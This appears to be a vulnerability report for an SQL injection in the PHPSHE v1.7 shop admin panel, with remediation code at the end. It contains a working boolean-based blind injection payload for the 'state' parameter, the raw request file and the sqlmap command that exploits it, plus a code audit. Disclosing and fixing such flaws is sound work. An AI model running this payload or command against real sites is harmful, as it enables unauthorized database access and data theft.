sqlmap output:
Parameter: state (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: mod=order&state=wtuan' AND 3809=(SELECT (CASE WHEN (3809=3809) THEN 3809 ELSE (SELECT 6050 UNION SELECT 8971) END))-- LULI

22.txt file contents:
GET /phpshe1.7/admin.php?mod=order&state=wtuan HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: XDEBUG_SESSION=XDEBUG_ECLIPSE; PHPSESSID=f29hn1a9eo2g3o2qcdq1241hf0
Upgrade-Insecure-Requests: 1
Vulnerability description
Test object:
(1) website: PHPSHE shopping system V1.7
(2) website domain name: http://www.phpshe.com/
(3) download address: http://www.phpshe.com/down/phpshe1.7.rar
(4) version: PHPSHE B2C mall system v1.7 (build 20180905 UTF8)
Detection time:
January 6, 2019
Vulnerability description:
SQL injection vulnerability in the admin background of the PHPSHE CMS system by Lingbao Jianhao Network Technology Co., Ltd.
POC and validation
Local setup environment:
1, download the PHPSHE V1.7 CMS system from http://www.phpshe.com/down/phpshe1.7.rar
2, log in to the background at http://localhost/phpshe1.7/admin.php; the account/password is admin/admin
Vulnerability injection point:
Vulnerability verification method:
python sqlmap.py -r 22.txt --batch -o --dbms=mysql --level 3 -a
22.txt file contents: the HTTP request reproduced at the top of this page.
Vulnerability identification


The solution
The background code should avoid splicing request parameters directly into the SQL statement.
Code audit:




Local environment: GET /phpshe1.7/admin.php?mod=order&state=wtuan
The execution flow at admin.php line 87 reaches the pe_selectall call on line 220 of order.php, which counts the order list.
The pe_selectall function is defined on line 208 of db.class.php.
pe_selectall builds the conditional statement through the _dowhere function, and sql_selectall returns the number of records per page. The malicious SQL is spliced into the query inside _dowhere, so the injection finally succeeds.
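To make the fix concrete, here is an added example (not PHPSHE's own code) that reconstructs the parameter-splicing pattern the audit describes in a minimal _dowhere-style helper and places the hardened form beside it; the `order_state` column, the `pe_order` table and the list of known states are assumptions.

```php
<?php
// Added example, not PHPSHE's own code: a minimal _dowhere-style helper showing the
// splicing pattern the audit describes, beside a hardened version. Names are assumed.

// Vulnerable pattern: the request value is concatenated into the WHERE text, so a
// quote inside $value closes the string literal and the remainder is parsed as SQL.
function dowhere_spliced(array $where): string
{
    $parts = [];
    foreach ($where as $field => $value) {
        $parts[] = "`$field` = '$value'";
    }
    return $parts ? ' WHERE ' . implode(' AND ', $parts) : '';
}

// Hardened pattern: column names come only from a fixed allow-list and values are
// returned separately as bound parameters, so they never become part of the SQL text.
function dowhere_prepared(array $where, array $allowedFields): array
{
    $parts = [];
    $params = [];
    foreach ($where as $field => $value) {
        if (!in_array($field, $allowedFields, true)) {
            throw new InvalidArgumentException("column not allowed: $field");
        }
        $parts[] = "`$field` = ?";
        $params[] = $value;
    }
    return [$parts ? ' WHERE ' . implode(' AND ', $parts) : '', $params];
}

// Second layer for an enum-like parameter such as the order state: reject anything
// outside the known set before it reaches the query builder at all.
function isKnownState(string $state, array $knownStates): bool
{
    return in_array($state, $knownStates, true);
}

$knownStates = ['wtuan']; // 'wtuan' is from the report; add the real order states here
$state = $_GET['state'] ?? 'wtuan';
if (!isKnownState($state, $knownStates)) {
    http_response_code(400);
    exit('invalid order state');
}

[$sql, $params] = dowhere_prepared(['order_state' => $state], ['order_state']);
// With PDO the count would run as:
// $pdo->prepare('SELECT COUNT(*) FROM `pe_order`' . $sql)->execute($params);
echo 'SELECT COUNT(*) FROM `pe_order`' . $sql, "\n";
echo json_encode($params), "\n";
```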